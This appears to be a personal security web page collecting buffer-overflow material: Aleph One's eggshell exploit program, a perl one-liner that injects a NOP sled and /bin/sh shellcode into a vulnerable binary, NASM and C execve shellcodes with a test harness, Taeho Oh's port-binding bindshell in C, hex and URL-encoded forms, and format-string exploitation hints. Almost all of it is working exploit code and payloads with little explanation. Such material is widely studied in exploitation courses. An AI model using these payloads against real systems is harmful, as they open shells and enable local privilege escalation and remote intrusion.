Computer Security

Advisories, published exploits/PoC and published papers/articles


 

milw0rm profile [external link]

Exploiting buffer overflows:


Local attacks:

Get the source
/* Program copied from "Smashing the stack for fun and profit"
 * of Aleph One
 *
 * Reference: http://www.phrack.org/phrack/49/P49-14
 */

#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);


  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  system("/bin/bash");
}


Anyway I prefer use a more direct method injecting the shellcode with perl.
Let's imagine that a vulnerable program prone to a buffer overflow due to a too long argument is at /usr/bin/vulnprogram. With the help of gdb we discover how many bytes must have the argument to overwrite EIP and see that 0xbfffe73c would be a good address to jump, then:

/usr/bin/vulnprogram `perl -e 'print "\x90"x400 .
"\xeb\x21\x5e\x31\xc0\x88\x46\x07\x80\x2e\x01\x80\x6e\x04\x01\x8d\x1e\x89" .
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8" .
"\xda\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68" . "\x22\x22\x22" . 
"\x3c\xe7\xff\xbf" x 160'`


Shellcodes for IA32:

get the source
; *****************************************************
;  Shellcode,
;  hace una syscall a bajo nivel execve() y ejecuta
;  /bin/sh, se usa direccionamiento relativo para
;  que sea mas portable
;
;  Este shellcode esta pensado para ser inyectado en el
;   nombre de un fichero o directorio, ya que como
;   se aprecia no se pone directamente /bin/sh, sino
;   0bin0sh para que sea un nombre de fichero válido.
;   Luego, cuando se ejecuta el shellcode se resta 1
;   a 0 para dar /          /=0x2f  0=0x30
;
;
; Programmed by jack <jack at gulcas.org>
; http://ciberjacobo.com
; ****************************************************

section	.text
	global	_start

_start:
	jmp short	GotoCall

shellcode:
	pop		esi
	xor		eax,eax
	mov byte	[esi + 7], al      ; Cerramos la cadena 
	sub byte	[esi],1            ; Sustituimos el 1er 0 por /
	sub byte	[esi + 4],1        ;  "           " 2o  " " "
	lea		ebx, [esi]
	mov long	[esi + 8], ebx
	mov long	[esi + 12], eax
	mov byte	al, 0x0b           ; execve syscall #
	mov		ebx, esi           ; argv1
	lea		ecx, [esi + 8]     ; argv2
	lea		edx, [esi + 12]    ; argv3
	int		0x80

GotoCall:
	call		shellcode
	db		'0bin0sh'
Get the source
/*
 * Shellcodes library
 *
 *
 *
 * Programmed by jack <jack at gulcas.org>
 * http://ciberjacobo.com
 */

/* shell sh spawner with placeholders by jack */
char shellcode1[] = 
	"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c"
	"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x4b\x4b\x4b"
	"\x4b";


/* shell sh spawner without placeholders by jack */
char shellcode2[] = 
	"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c"
	"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68";


/* shell bash spawner without placeholders by jack */
char shellcode3[] =
	"\xeb\x1a\x5e\x31\xc0\x88\x46\x09\x8d\x1e\x89\x5e\x0a\x89\x46\x0e"
	"\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe1\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";


/* shellcode for ls without placeholders by jack */
char shellcode4[] = 
	"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c"
	"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x6c\x73";


/* shellcode for exit(0) */
char shellcode5[] =
	"\x31\xdb\xb0\x01\xcd\x80";


/* shell sh spawner for file or path injection by jack */
char shellcode6[] =
	"\xeb\x21\x5e\x31\xc0\x88\x46\x07\x80\x2e\x01\x80\x6e\x04\x01"
	"\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
	"\x8d\x56\x0c\xcd\x80\xe8\xda\xff\xff\xff\x30\x62\x69\x6e\x30"
	"\x73\x68";


/* Choose a shellcode to try: */
char *shellcode= shellcode6;

int main() {
  int *ret;
  ret = (int*) &ret + 2;
  // Dirty trick to can execute machine code
  (*ret) = (int)shellcode;
}

Remote attacks:

Taeho Oh bindshell on port 30464 in many formats: (get the source)
char shellcode[]= /* 177 bytes                                   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\xcd\x80"                      /* int $0x80             */
	"\x85\xc0"                      /* testl %eax,%eax       */
	"\x75\x43"                      /* jne 0x43              */
	"\xeb\x43"                      /* jmp 0x43              */
	"\x5e"                          /* popl %esi             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x06"                      /* movb $0x6,%al         */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x01"                      /* movb $0x1,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */

	/* bind port= 0x77 = 30464 */
	"\xb0\x77"                      /* movb $0x77,%al        */
	"\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */

	"\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
	"\xb0\x10"                      /* movb $0x10,%al        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x02"                      /* movb $0x2,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x04"                      /* jmp 0x4               */
	"\xeb\x55"                      /* jmp 0x55              */
	"\xeb\x5b"                      /* jmp 0x5b              */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x04"                      /* movb $0x4,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x05"                      /* movb $0x5,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x88\xc3"                      /* movb %al,%bl          */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x01"                      /* movb $0x1,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x02"                      /* movb $0x2,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\x5b\xff\xff\xff";         /* call -0xa5            */



char shellcode[] = "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31"
"\xc0\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08"
"\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x77\x66\x89\x46"
"\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66"
"\xb3\x02\xcd\x80\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0"
"\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f"
"\x62\x69\x6e\x89\x06\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89"
"\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0"
"\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";


/* Taeho Oh bindshell (177 bytes) HTML-escaped */

%31%c0%b0%02%cd%80%85%c0%75%43%eb%43%5e%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%eb%04%eb%55%eb%5b%b0%01%89%46%04%b0%66%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%2f%62%69%6e%89%06%b8%2f%73%68%2f%89%46%04%31%c0%88%46%07%89%76%08%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db%cd%80%e8%5b%ff%ff%ff

Format strings


Some hints for exploiting:
%numberx  (align with spaces)
%number$n
%#numberx (align with spaces)
%x%x%x%xAAAAAAAAAAAAAAAAAAAA-%n